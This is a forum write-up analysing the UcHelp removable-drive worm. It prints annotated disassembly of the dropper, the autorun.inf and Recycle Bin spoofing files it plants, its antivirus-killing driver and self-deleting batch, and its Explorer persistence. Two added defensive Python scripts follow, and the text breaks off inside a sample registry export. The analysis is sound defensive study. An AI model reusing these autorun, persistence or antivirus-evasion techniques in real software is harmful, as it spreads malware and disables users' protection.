【Title】: UcHelp Virus Analysis, by CaTer
【Author】: Cater
【Author's e-mail】: 24882688@qq.com
【Author's QQ】: 24882688
【Download】: search for it yourself
【Packer】: FSG 2.0
【Language】: C++ 6.0
【Tools】: OD (OllyDbg)
【Platform】: XP-SP2
【Author's note】: Done purely out of interest, for no other purpose. Where I have slipped up, corrections from the experts are welcome!
--------------------------------------------------------------------------------
【Details】
UcHelp Virus Analysis
Aside:
Already in my second year and still getting nowhere; no idea what I will do for a job later on... frustrating.
Plenty of annoyances too. Lately the school computer lab has been overrun with viruses, mainly the UcHelp virus.
///////////////////////////////////////////////////////////
The main symptom: a removable drive contains
===========================
X:\RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini
X:\autorun.inf
-----------------------
X:\autorun.inf
is not visible under normal settings
X:\RECYCLER\
cannot be opened normally
-----------------------
===========================
+++++++++++++++++++++++++++++++++++++++++++++
Loaded automatically into Explorer:
system32\AceExt32.dll
windows\Downloaded Program Files\ZipExt32.dll
+++++++++++++++++++++++++++++++++++++++++++++
The virus naturally infects every removable storage device, installs itself to start automatically on the host, and goes on to infect other machines and removable devices.
///////////////////////////////////////////////////////////
The program isn't hiding files through the registry? And yet the virus never gets cleaned out completely~
So there was nothing for it but to grit my teeth and analyze this virus (I don't know yet whether there is already an analysis of it on the forum).
Enough chatter, on to my analysis~
Cater [*.S.T] QQ:24882688
Written 2007.06.01, Yangzhou/Nanjing
=================================================================================================
Step 1: start with the main program (UcHelp.exe)
00401800 /$ 55               PUSH EBP
00401801 |. 8BEC             MOV EBP,ESP
00401803 |. 83E4 F8          AND ESP,FFFFFFF8
00401806 |. 81EC 94010000    SUB ESP,194
0040180C |. 33C0             XOR EAX,EAX
0040180E |. 894424 09        MOV DWORD PTR SS:[ESP+9],EAX
00401812 |. 53               PUSH EBX
00401813 |. 66:894424 11     MOV WORD PTR SS:[ESP+11],AX
00401818 |. 56               PUSH ESI
00401819 |. 57               PUSH EDI
0040181A |. 884424 20        MOV BYTE PTR SS:[ESP+20],AL
0040181E |. 884424 1B        MOV BYTE PTR SS:[ESP+1B],AL
00401822 |. B9 1F000000      MOV ECX,1F
00401827 |. 8D7C24 21        LEA EDI,DWORD PTR SS:[ESP+21]
0040182B |. F3:AB            REP STOS DWORD PTR ES:[EDI]
0040182D |. 68 80000000      PUSH 80                                      ; /BufSize = 80 (128.)
00401832 |. 8D4C24 24        LEA ECX,DWORD PTR SS:[ESP+24]                ; |
00401836 |. 66:AB            STOS WORD PTR ES:[EDI]                       ; |
00401838 |. 51               PUSH ECX                                     ; |PathBuffer
00401839 |. 6A 00            PUSH 0                                       ; |hModule = NULL
0040183B |. C64424 20 00     MOV BYTE PTR SS:[ESP+20],0                   ; |
00401840 |. AA               STOS BYTE PTR ES:[EDI]                       ; |
00401841 |. FF15 7C204000    CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>    ; \GetModuleFileNameA
00401847 |. E8 E4F8FFFF      CALL UcHelp.00401130                         ; check whether a process named avp.exe is running
0040184C |. 84C0             TEST AL,AL
0040184E |. 74 2E            JE SHORT UcHelp.0040187E
00401850 |. 8B55 08          MOV EDX,DWORD PTR SS:[EBP+8]                 ; avp.exe is running: it comes here
00401853 |. 6A 05            PUSH 5                                       ; /ShowState = SW_SHOW
00401855 |. 6A 00            PUSH 0                                       ; |/lParam = 0
00401857 |. 68 E0174000      PUSH UcHelp.004017E0                         ; ||pDlgProc = UcHelp.004017E0
0040185C |. 6A 00            PUSH 0                                       ; ||hOwner = NULL
0040185E |. 6A 65            PUSH 65                                      ; ||pTemplate = 65
00401860 |. 52               PUSH EDX                                     ; ||hInst
00401861 |. FF15 E4204000    CALL DWORD PTR DS:[<&USER32.CreateDialog>    ; |\CreateDialogParamA
00401867 |. 50               PUSH EAX                                     ; |hWnd
00401868 |. FF15 E8204000    CALL DWORD PTR DS:[<&USER32.ShowWindow>]     ; \ShowWindow
0040186E |. E8 2DF9FFFF      CALL UcHelp.004011A0                         ; drop resource "ret" to C:\sysret.dat and run it
00401873 |. 68 58020000      PUSH 258                                     ; /Timeout = 600. ms
00401878 |. FF15 8C204000    CALL DWORD PTR DS:[<&KERNEL32.Sleep>]        ; \Sleep
0040187E |> \E8 ADFBFFFF     CALL UcHelp.00401430                         ; drop resource "dll" to system32\AceExt32.dll and load it into the explorer process
00401883 |. 8B35 B4204000    MOV ESI,DWORD PTR DS:[<&MSVCRT.strs>         ; msvcrt.strstr
00401889 |. 8D4424 20        LEA EAX,DWORD PTR SS:[ESP+20]
0040188D |. 68 C0234000      PUSH UcHelp.004023C0                         ; /UcHelp.exe
00401892 |. 50               PUSH EAX                                     ; |s1
00401893 |. FFD6             CALL ESI                                     ; \strstr
00401895 |. 83C4 08          ADD ESP,8                                    ; check whether this program's own file name contains UcHelp.exe
00401898 |. 85C0             TEST EAX,EAX
0040189A |. 75 4B            JNZ SHORT UcHelp.004018E7
0040189C |. 8D4C24 10        LEA ECX,DWORD PTR SS:[ESP+10]                ; not named UcHelp.exe: run the following
004018A0 |. 51               PUSH ECX                                     ; /pHandle
004018A1 |. 68 3F000F00      PUSH 0F003F                                  ; |Access = KEY_ALL_ACCESS
004018A6 |. 50               PUSH EAX                                     ; |Reserved
004018A7 |. 68 78214000      PUSH UcHelp.00402178                         ; |SOFTWARE\Microsoft\Windows\CurrentVersion
004018AC |. 68 02000080      PUSH 80000002                                ; |hKey = HKEY_LOCAL_MACHINE
004018B1 |. FF15 08204000    CALL DWORD PTR DS:[<&ADVAPI32.RegOp>         ; \RegOpenKeyExA
004018B7 |. 68 68214000      PUSH UcHelp.00402168                         ; /yes
004018BC |. FF15 3C204000    CALL DWORD PTR DS:[<&KERNEL32.lstrl>         ; \lstrlenA
004018C2 |. 8B5424 10        MOV EDX,DWORD PTR SS:[ESP+10]
004018C6 |. 50               PUSH EAX                                     ; /BufSize
004018C7 |. 68 68214000      PUSH UcHelp.00402168                         ; |yes
004018CC |. 6A 01            PUSH 1                                       ; |ValueType = REG_SZ
004018CE |. 6A 00            PUSH 0                                       ; |Reserved = 0
004018D0 |. 68 6C214000      PUSH UcHelp.0040216C                         ; |SM_GameDrop
004018D5 |. 52               PUSH EDX                                     ; |hKey
004018D6 |. FF15 00204000    CALL DWORD PTR DS:[<&ADVAPI32.RegSe>         ; \RegSetValueExA
004018DC |. 8B4424 10        MOV EAX,DWORD PTR SS:[ESP+10]                ; writes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SM_GameDrop = yes
004018E0 |. 50               PUSH EAX                                     ; /hKey
004018E1 |. FF15 18204000    CALL DWORD PTR DS:[<&ADVAPI32.RegCl>         ; \RegCloseKey
004018E7 |> 8D4C24 20        LEA ECX,DWORD PTR SS:[ESP+20]
004018EB |. 68 C0234000      PUSH UcHelp.004023C0                         ; UcHelp.exe
004018F0 |. 51               PUSH ECX
004018F1 |. FFD6             CALL ESI
004018F3 |. 83C4 08          ADD ESP,8
004018F6 |. 85C0             TEST EAX,EAX
004018F8 |. 0F84 70010000    JE UcHelp.00401A6E
004018FE |. 8B35 EC204000    MOV ESI,DWORD PTR DS:[<&USER32.wspr>         ; USER32.wsprintfA
00401904 |. 8B3D 70204000    MOV EDI,DWORD PTR DS:[<&KERNEL32.Ge>         ; kernel32.GetDriveTypeA
0040190A |. B3 43            MOV BL,43
0040190C |. 8D6424 00        LEA ESP,DWORD PTR SS:[ESP]
00401910 |> 0FBEC3          /MOVSX EAX,BL
00401913 |. 50              |PUSH EAX
00401914 |. 33D2            |XOR EDX,EDX
00401916 |. 8D4C24 18       |LEA ECX,DWORD PTR SS:[ESP+18]
0040191A |. 895424 18       |MOV DWORD PTR SS:[ESP+18],EDX
0040191E |. 68 BC234000     |PUSH UcHelp.004023BC                         ; %c:
00401923 |. 51              |PUSH ECX
00401924 |. 895424 24       |MOV DWORD PTR SS:[ESP+24],EDX
00401928 |. FFD6            |CALL ESI
0040192A |. 83C4 0C         |ADD ESP,0C
0040192D |. 8D5424 14       |LEA EDX,DWORD PTR SS:[ESP+14]
00401931 |. 52              |PUSH EDX
00401932 |. FFD7            |CALL EDI
00401934 |. 83F8 02         |CMP EAX,2
00401937 |. 74 09           |JE SHORT UcHelp.00401942                     ; removable drive (DRIVE_REMOVABLE = 2) found: leave the loop
00401939 |. FEC3            |INC BL                                       ; enumerate the drive letters from C: through Z:
0040193B |. 80FB 5A         |CMP BL,5A
0040193E |.^ 7E D0          \JLE SHORT UcHelp.00401910
00401940 |. EB 7B            JMP SHORT UcHelp.004019BD
00401942 |> 6A 00            PUSH 0                                       ; /Title = NULL
00401944 |. 68 AC234000      PUSH UcHelp.004023AC                         ; |CabinetWClass
00401949 |. FF15 F4204000    CALL DWORD PTR DS:[<&USER32.FindWin>         ; \FindWindowA
0040194F |. 8B35 FC204000    MOV ESI,DWORD PTR DS:[<&USER32.Find>         ; USER32.FindWindowExA
00401955 |. 6A 00            PUSH 0                                       ; /Title = NULL
00401957 |. 68 A4234000      PUSH UcHelp.004023A4                         ; |WorkerW
0040195C |. 6A 00            PUSH 0                                       ; |hAfterWnd = NULL
0040195E |. 50               PUSH EAX                                     ; |hParent
0040195F |. FFD6             CALL ESI                                     ; \FindWindowExA
00401961 |. 6A 00            PUSH 0                                       ; /Title = NULL
00401963 |. 68 94234000      PUSH UcHelp.00402394                         ; |ReBarWindow32
00401968 |. 6A 00            PUSH 0                                       ; |hAfterWnd = NULL
0040196A |. 50               PUSH EAX                                     ; |hParent
0040196B |. FFD6             CALL ESI                                     ; \FindWindowExA
0040196D |. 6A 00            PUSH 0                                       ; /Title = NULL
0040196F |. 68 84234000      PUSH UcHelp.00402384                         ; |ComboBoxEx32
00401974 |. 6A 00            PUSH 0                                       ; |hAfterWnd = NULL
00401976 |. 50               PUSH EAX                                     ; |hParent
00401977 |. FFD6             CALL ESI                                     ; \FindWindowExA
00401979 |. 6A 00            PUSH 0                                       ; /Title = NULL
0040197B |. 68 78234000      PUSH UcHelp.00402378                         ; |ComboBox
00401980 |. 6A 00            PUSH 0                                       ; |hAfterWnd = NULL
00401982 |. 50               PUSH EAX                                     ; |hParent
00401983 |. FFD6             CALL ESI                                     ; \FindWindowExA
00401985 |. 6A 00            PUSH 0                                       ; /Title = NULL
00401987 |. 68 70234000      PUSH UcHelp.00402370                         ; |Edit
0040198C |. 6A 00            PUSH 0                                       ; |hAfterWnd = NULL
0040198E |. 50               PUSH EAX                                     ; |hParent
0040198F |. FFD6             CALL ESI                                     ; \FindWindowExA
00401991 |. 8B3D F0204000    MOV EDI,DWORD PTR DS:[<&USER32.Send>         ; USER32.SendMessageA
00401997 |. 8BF0             MOV ESI,EAX
00401999 |. 8D4424 14        LEA EAX,DWORD PTR SS:[ESP+14]                ; below: open the removable drive in the Explorer window (put "X:" into the address-bar Edit control, then send Enter)
0040199D |. 50               PUSH EAX                                     ; /lParam
0040199E |. 6A 00            PUSH 0                                       ; |wParam = 0
004019A0 |. 6A 0C            PUSH 0C                                      ; |Message = WM_SETTEXT
004019A2 |. 56               PUSH ESI                                     ; |hWnd
004019A3 |. FFD7             CALL EDI                                     ; \SendMessageA
004019A5 |. 6A 00            PUSH 0                                       ; /lParam = 0
004019A7 |. 6A 0D            PUSH 0D                                      ; |wParam = D (VK_RETURN)
004019A9 |. 68 00010000      PUSH 100                                     ; |Message = WM_KEYDOWN
004019AE |. 56               PUSH ESI                                     ; |hWnd
004019AF |. FFD7             CALL EDI                                     ; \SendMessageA
004019B1 |. 6A 00            PUSH 0                                       ; /lParam = 0
004019B3 |. 6A 0D            PUSH 0D                                      ; |wParam = D (VK_RETURN)
004019B5 |. 68 01010000      PUSH 101                                     ; |Message = WM_KEYUP
004019BA |. 56               PUSH ESI                                     ; |hWnd
004019BB |. FFD7             CALL EDI                                     ; \SendMessageA
004019BD |> C68424 A00000>   MOV BYTE PTR SS:[ESP+A0],0                   ; the code above, roughly, is the virus getting ready to go after the removable drive
004019C5 |. 33C0             XOR EAX,EAX
004019C7 |. B9 3F000000      MOV ECX,3F
004019CC |. 8DBC24 A10000>   LEA EDI,DWORD PTR SS:[ESP+A1]
004019D3 |. F3:AB            REP STOS DWORD PTR ES:[EDI]
004019D5 |. 8D4C24 10        LEA ECX,DWORD PTR SS:[ESP+10]
004019D9 |. 51               PUSH ECX                                     ; /pHandle
004019DA |. 66:AB            STOS WORD PTR ES:[EDI]                       ; |
004019DC |. 68 30234000      PUSH UcHelp.00402330                         ; |Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
004019E1 |. 68 01000080      PUSH 80000001                                ; |hKey = HKEY_CURRENT_USER
004019E6 |. AA               STOS BYTE PTR ES:[EDI]                       ; |
004019E7 |. FF15 10204000    CALL DWORD PTR DS:[<&ADVAPI32.RegOp>         ; \RegOpenKeyA
004019ED |. 8B1D 14204000    MOV EBX,DWORD PTR DS:[<&ADVAPI32.Re>         ; ADVAPI32.RegEnumKeyA
004019F3 |. C74424 1C 0A0>   MOV DWORD PTR SS:[ESP+1C],0A
004019FB |. EB 03            JMP SHORT UcHelp.00401A00
004019FD |  8D49 00          LEA ECX,DWORD PTR DS:[ECX]
00401A00 |> 8B4424 10       /MOV EAX,DWORD PTR SS:[ESP+10]
00401A04 |. 68 00010000     |PUSH 100
00401A09 |. 8D9424 A40000>  |LEA EDX,DWORD PTR SS:[ESP+A4]
00401A10 |. 52              |PUSH EDX
00401A11 |. 33F6            |XOR ESI,ESI
00401A13 |. 56              |PUSH ESI
00401A14 |. 50              |PUSH EAX
00401A15 |. FFD3            |CALL EBX
00401A17 |. 85C0            |TEST EAX,EAX
00401A19 |. 75 42           |JNZ SHORT UcHelp.00401A5D
00401A1B |. EB 03           |JMP SHORT UcHelp.00401A20
00401A1D |  8D49 00         |LEA ECX,DWORD PTR DS:[ECX]
00401A20 |> 8B5424 10       |/MOV EDX,DWORD PTR SS:[ESP+10]
00401A24 |. 8D8C24 A00000>  ||LEA ECX,DWORD PTR SS:[ESP+A0]
00401A2B |. 51              ||PUSH ECX                                    ; /SubKey
00401A2C |. 52              ||PUSH EDX                                    ; |hKey
00401A2D |. FF15 DC204000   ||CALL DWORD PTR DS:[<&SHLWAPI.SHDe>         ; \SHDeleteKeyA
00401A33 |. 33C0            ||XOR EAX,EAX
00401A35 |. B9 40000000     ||MOV ECX,40
00401A3A |. 8DBC24 A00000>  ||LEA EDI,DWORD PTR SS:[ESP+A0]
00401A41 |. F3:AB           ||REP STOS DWORD PTR ES:[EDI]
00401A43 |. 8B4C24 10       ||MOV ECX,DWORD PTR SS:[ESP+10]
00401A47 |. 68 00010000     ||PUSH 100
00401A4C |. 8D8424 A40000>  ||LEA EAX,DWORD PTR SS:[ESP+A4]
00401A53 |. 50              ||PUSH EAX
00401A54 |. 46              ||INC ESI
00401A55 |. 56              ||PUSH ESI
00401A56 |. 51              ||PUSH ECX
00401A57 |. FFD3            ||CALL EBX
00401A59 |. 85C0            ||TEST EAX,EAX
00401A5B |.^ 74 C3          |\JE SHORT UcHelp.00401A20
00401A5D |> FF4C24 1C       |DEC DWORD PTR SS:[ESP+1C]                    ; deletes the subkeys under MountPoints2 one after another (ten passes)
00401A61 |.^ 75 9D          \JNZ SHORT UcHelp.00401A00
00401A63 |. E8 B8F7FFFF      CALL UcHelp.00401220                         ; check whether SM_GameDrop is "yes"; if not, drop resource "exe" to ulinshi32.exe and run it
00401A68 |. 8B35 B4204000    MOV ESI,DWORD PTR DS:[<&MSVCRT.strs>         ; msvcrt.strstr
00401A6E |> E8 0DFCFFFF      CALL UcHelp.00401680                         ; create CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150}, associate AceExt32.dll with it and set up the related entries
00401A73 |. E8 28F9FFFF      CALL UcHelp.004013A0                         ; copy this program to C:\windows\Downloaded Program Files\CxUSBKey.exe
00401A78 |. 8D5424 20        LEA EDX,DWORD PTR SS:[ESP+20]
00401A7C |. 68 C0234000      PUSH UcHelp.004023C0                         ; UcHelp.exe
00401A81 |. 52               PUSH EDX
00401A82 |. FFD6             CALL ESI
00401A84 |. 83C4 08          ADD ESP,8
00401A87 |. 85C0             TEST EAX,EAX
00401A89 |. 75 05            JNZ SHORT UcHelp.00401A90
00401A8B |. E8 70F5FFFF      CALL UcHelp.00401000                         ; create ziptmp.bat in the temp folder, write a batch script that deletes this program, and run it
00401A90 |> 5F               POP EDI
00401A91 |. 5E               POP ESI
00401A92 |. 33C0             XOR EAX,EAX
00401A94 |. 5B               POP EBX
00401A95 |. 8BE5             MOV ESP,EBP
00401A97 |. 5D               POP EBP
00401A98 \. C2 1000          RETN 10
=================================================================================================
Step 2: analyze sysret.dat, the component aimed at the antivirus
The virus's main program UcHelp.exe drops its resource "ret" as
C:\sysret.dat
00401600  55               PUSH EBP
00401601  8BEC             MOV EBP,ESP
00401603  83E4 F8          AND ESP,FFFFFFF8
00401606  81EC 08020000    SUB ESP,208
0040160C  56               PUSH ESI
0040160D  57               PUSH EDI
0040160E  E8 DDFEFFFF      CALL UnPacK_D.004014F0                       ; drop resource SYSRET to C:\sysret.sys, load it into the kernel, and reboot the machine
00401613  A1 74114000      MOV EAX,DWORD PTR DS:[401174]
00401618  66:8B0D 7811400> MOV CX,WORD PTR DS:[401178]
0040161F  894424 10        MOV DWORD PTR SS:[ESP+10],EAX
00401623  66:894C24 14     MOV WORD PTR SS:[ESP+14],CX
00401628  33C0             XOR EAX,EAX
0040162A  B9 3E000000      MOV ECX,3E
0040162F  8D7C24 16        LEA EDI,DWORD PTR SS:[ESP+16]
00401633  F3:AB            REP STOS DWORD PTR ES:[EDI]
00401635  68 00010000      PUSH 100
0040163A  8D9424 14010000  LEA EDX,DWORD PTR SS:[ESP+114]
00401641  52               PUSH EDX
00401642  6A 00            PUSH 0
00401644  66:AB            STOS WORD PTR ES:[EDI]
00401646  66:C74424 14 22> MOV WORD PTR SS:[ESP+14],22
0040164D  FF15 40104000    CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>    ; kernel32.GetModuleFileNameA
00401653  8B35 3C104000    MOV ESI,DWORD PTR DS:[<&KERNEL32.lstrcat>    ; kernel32.lstrcatA
00401659  8D8424 10010000  LEA EAX,DWORD PTR SS:[ESP+110]
00401660  50               PUSH EAX
00401661  8D4C24 14        LEA ECX,DWORD PTR SS:[ESP+14]
00401665  51               PUSH ECX
00401666  FFD6             CALL ESI
00401668  8D5424 08        LEA EDX,DWORD PTR SS:[ESP+8]
0040166C  52               PUSH EDX
0040166D  8D4424 14        LEA EAX,DWORD PTR SS:[ESP+14]
00401671  50               PUSH EAX
00401672  FFD6             CALL ESI
00401674  68 68114000      PUSH UnPacK_D.00401168                       ; ASCII "del %0" (with a line break before and after it)
00401679  8D4C24 14        LEA ECX,DWORD PTR SS:[ESP+14]
0040167D  51               PUSH ECX
0040167E  FFD6             CALL ESI
00401680  6A 00            PUSH 0
00401682  6A 00            PUSH 0
00401684  6A 02            PUSH 2
00401686  6A 00            PUSH 0
00401688  6A 00            PUSH 0
0040168A  68 00000040      PUSH 40000000
0040168F  68 5C114000      PUSH UnPacK_D.0040115C                       ; ASCII "tempds.bat"
00401694  FF15 24104000    CALL DWORD PTR DS:[<&KERNEL32.CreateFile>    ; kernel32.CreateFileA
0040169A  8BF0             MOV ESI,EAX
0040169C  8D4424 10        LEA EAX,DWORD PTR SS:[ESP+10]
004016A0  8D50 01          LEA EDX,DWORD PTR DS:[EAX+1]
004016A3  8A08             MOV CL,BYTE PTR DS:[EAX]
004016A5  40               INC EAX
004016A6  84C9             TEST CL,CL
004016A8 ^75 F9            JNZ SHORT UnPacK_D.004016A3
004016AA  2BC2             SUB EAX,EDX
004016AC  6A 00            PUSH 0
004016AE  8D5424 10        LEA EDX,DWORD PTR SS:[ESP+10]
004016B2  52               PUSH EDX
004016B3  50               PUSH EAX
004016B4  8D4424 1C        LEA EAX,DWORD PTR SS:[ESP+1C]
004016B8  50               PUSH EAX
004016B9  56               PUSH ESI
004016BA  FF15 1C104000    CALL DWORD PTR DS:[<&KERNEL32.WriteFile>>    ; kernel32.WriteFile
004016C0  56               PUSH ESI
004016C1  FF15 18104000    CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>    ; kernel32.CloseHandle
004016C7  6A 14            PUSH 14
004016C9  FF15 38104000    CALL DWORD PTR DS:[<&KERNEL32.Sleep>]        ; kernel32.Sleep
004016CF  6A 00            PUSH 0
004016D1  68 5C114000      PUSH UnPacK_D.0040115C                       ; ASCII "tempds.bat"
004016D6  FF15 34104000    CALL DWORD PTR DS:[<&KERNEL32.WinExec>]      ; kernel32.WinExec
004016DC  5F               POP EDI                                      ; creates tempds.bat in its own folder,
004016DD  5E               POP ESI                                      ; writes a batch script that deletes this program into it,
004016DE  8BE5             MOV ESP,EBP                                  ; and runs tempds.bat
004016E0  5D               POP EBP
004016E1  C2 1000          RETN 10
============================================
A note
004015D5 /74 0D            JE SHORT UnPacK_D.004015E4
004015D7 |68 80144000      PUSH UnPacK_D.00401480
004015DC |E8 CFFEFFFF      CALL UnPacK_D.004014B0                       ; this is the reboot routine
I suspect that
sysret.sys
contains nothing more than ring-0 code to stop avp.exe from running.
// Thanks to 恶灵骑士 MJ0011 for the explanation; that turned out to be the secret of this part.
=================================================================================================
Step 3: analyze the virus's core code, AceExt32.dll
Couldn't be bothered to trace through the dll any further
Roughly: it looks for removable storage devices
----------------------------------------------
creates the folder
X:\RECYCLER\
----------------------------------------------
----------------------------------------------------------
writes the files
X:\RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini
X:\autorun.inf
Contents:
X:\autorun.inf
===========================================
[AutoRun]
Shell=打开(&O)
shell\打开(&O)\command=RECYCLER\UcHelp.exe
===========================================
X:\RECYCLER\desktop.ini
===========================================
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
===========================================
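To make the three markers above checkable on a mounted drive without double-clicking anything, here is a small scanner. It is an added example, not code from the original post or from the virus: it reads autorun.inf and desktop.ini with a minimal INI parser (the `[AutoRun]` verb line `shell\打开(&O)\command=` is the form the virus uses; `open=` and `shellexecute=` are the two other ways an autorun.inf can launch a program), and flags any top-level folder whose desktop.ini carries the Recycle Bin CLSID {645FF040-5081-101B-9F08-00AA002F954E}, which is what makes X:\RECYCLER\ display as, and behave like, the Recycle Bin. The sample drive it lays out in a temporary directory is constructed from the file contents listed above; saving autorun.inf in GBK is my assumption about how a Chinese XP machine would have written the 打开 verb, and the executable-suffix list is mine too.

```python
"""Scan a mounted drive root for the UcHelp removable-media markers listed above.

Added example, not code from the original post or from the virus; see the lead-in for assumptions.
"""
import os
import tempfile

# CLSID of the Recycle Bin shell folder. A desktop.ini pointing at it makes the folder display
# and behave as the Recycle Bin, which is why X:\RECYCLER\ "cannot be opened normally".
RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"
# Extensions treated as executable when listing a spoofed folder (my list, not from the post).
EXECUTABLE_SUFFIXES = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif")


def find_name(folder, wanted):
    """Case-insensitive lookup: FAT volumes are case-insensitive, a Linux mount is not."""
    for entry in os.listdir(folder):
        if entry.lower() == wanted:
            return os.path.join(folder, entry)
    return None


def read_ini_text(path):
    """Read an INI written on an XP box: UTF-8 first, then GBK (cp936, in which the Chinese
    '打开(&O)' verb would have been saved), then Latin-1 so the scan never aborts."""
    with open(path, "rb") as f:
        data = f.read()
    for codec in ("utf-8", "gbk"):
        try:
            return data.decode(codec)
        except UnicodeDecodeError:
            pass
    return data.decode("latin-1")


def parse_ini(text):
    """Minimal INI parser -> {section: {key: value}}, names lower-cased. A key such as
    'shell\\打开(&O)\\command' stays whole because each line is split on its first '=' only."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def autorun_commands(text):
    """Every program an autorun.inf can launch: open=, shellexecute=, and each
    shell\\<verb>\\command= line (the form the virus uses, with a Chinese verb)."""
    autorun = parse_ini(text).get("autorun", {})
    return [(key, value) for key, value in autorun.items()
            if key in ("open", "shellexecute")
            or (key.startswith("shell\\") and key.endswith("\\command"))]


def is_recycle_bin_spoof(desktop_ini_text):
    """True if this desktop.ini turns its folder into a fake Recycle Bin."""
    info = parse_ini(desktop_ini_text).get(".shellclassinfo", {})
    return info.get("clsid", "").upper() == RECYCLE_BIN_CLSID


def scan_drive_root(root):
    """Findings for one drive root (e.g. 'E:\\\\'); an empty list means no marker was found."""
    findings = []
    autorun_path = find_name(root, "autorun.inf")
    if autorun_path and os.path.isfile(autorun_path):
        for key, cmd in autorun_commands(read_ini_text(autorun_path)):
            findings.append(f"autorun.inf launches '{cmd}' via {key}")
    for name in sorted(os.listdir(root)):
        folder = os.path.join(root, name)
        if not os.path.isdir(folder):
            continue
        ini = find_name(folder, "desktop.ini")
        if ini and is_recycle_bin_spoof(read_ini_text(ini)):
            exes = sorted(f for f in os.listdir(folder) if f.lower().endswith(EXECUTABLE_SUFFIXES))
            findings.append(f"{name}\\desktop.ini spoofs the Recycle Bin; executables inside: {exes}")
    return findings


def build_sample_drive(root):
    """Constructed sample: the three files from the analysis, with autorun.inf saved in GBK."""
    os.makedirs(os.path.join(root, "RECYCLER"), exist_ok=True)
    autorun = "[AutoRun]\r\nShell=打开(&O)\r\nshell\\打开(&O)\\command=RECYCLER\\UcHelp.exe\r\n"
    with open(os.path.join(root, "autorun.inf"), "wb") as f:
        f.write(autorun.encode("gbk"))
    with open(os.path.join(root, "RECYCLER", "desktop.ini"), "wb") as f:
        f.write(b"[.ShellClassInfo]\r\nCLSID={645FF040-5081-101B-9F08-00AA002F954E}\r\n")
    with open(os.path.join(root, "RECYCLER", "UcHelp.exe"), "wb") as f:
        f.write(b"MZ placeholder, not the real sample")  # stand-in bytes, not malware
    return root


def demo():
    """Build the sample drive in a temporary directory and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_drive_root(build_sample_drive(tmp))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it as a script to scan the constructed sample, or call `scan_drive_root("E:\\")` (or the mount point on a Linux analysis box) against a real drive; an empty list means none of the markers was found. Reading the files through a parser rather than opening the drive in Explorer is the point: nothing here triggers the Shell verb.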
--------------------------------------------------------------
Tricks it plays:
1.
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
This is where AceExt32.dll gets loaded into the Explorer.exe process
ZipExt32.dll seems to take part here as well
2.
Writes
{35CEC8A3-2BE6-11D2-8773-92E220524150} under CLSID and associates it with AceExt32.dll
3.
This dll also hides autorun.inf and blocks access to it
4.
Its remaining functionality is much the same as running UcHelp.exe~
That's roughly what it does~
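The registry side of this persistence (items 1 and 2 above, and the matching registry step in the removal procedure at the end of the post) can be audited offline from a regedit export. The following is an added example, not code from the original post: it parses the `.reg` text format, walks every ShellServiceObjectDelayLoad (SSODL) entry, resolves its CLSID to the `InprocServer32` module, and flags entries whose CLSID is not in a stock-XP allow-list, whose module matches the DLL names from this analysis, or whose module lives outside %SystemRoot%\system32 (as ZipExt32.dll does, in "Downloaded Program Files"). Assumptions: the SSODL value names `AceExt32`/`ZipExt32` in the constructed sample export are mine, since the post does not say what the virus calls them; the allow-list of four stock XP SP2 SSODL CLSIDs is from memory and should be checked against a clean machine; and %SystemRoot% is taken to be C:\WINDOWS. One thing worth noticing while doing that check: the virus's CLSIDs {35CEC8A3-2BE6-11D2-8773-92E220524150} and {...4140} differ only in the last digits from the legitimate SysTray entry {35CEC8A3-2BE6-11D2-8773-92E220524153}, so match on the full GUID, never on a prefix.

```python
"""Audit a regedit .reg export for UcHelp's ShellServiceObjectDelayLoad persistence.

Added example, not code from the original post; see the lead-in for what is assumed.
"""
import ntpath

SSODL_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"

# DLL names this analysis attributes to the virus.
IOC_MODULES = {"aceext32.dll", "zipext32.dll", "ext32.dll"}

# SSODL CLSIDs on a stock XP SP2 install (assumption from memory: verify against a clean box).
# The virus's {35CEC8A3-...-92E220524150} / {...4140} differ from SysTray only in the last digits.
KNOWN_GOOD_CLSIDS = {
    "{35CEC8A3-2BE6-11D2-8773-92E220524153}",  # SysTray          -> stobject.dll
    "{7849596A-48EA-486E-8937-A2A3009F31A9}",  # PostBootReminder -> shell32.dll
    "{FBEB8A05-BEEE-4442-804E-409D6C4515E9}",  # CDBurn           -> shell32.dll
    "{E6FB5E20-DE35-11CF-9C87-00AA005127ED}",  # WebCheck         -> webcheck.dll
}

# Constructed sample export: one legitimate entry plus the two the virus adds (value names assumed).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"SysTray"="{35CEC8A3-2BE6-11D2-8773-92E220524153}"
"AceExt32"="{35CEC8A3-2BE6-11D2-8773-92E220524150}"
"ZipExt32"="{35CEC8A3-2BE6-11D2-8773-92E220524140}"

[HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524153}\InprocServer32]
@="%SystemRoot%\\system32\\stobject.dll"

[HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150}\InprocServer32]
@="C:\\WINDOWS\\system32\\AceExt32.dll"
"ThreadingModel"="Both"

[HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}\InprocServer32]
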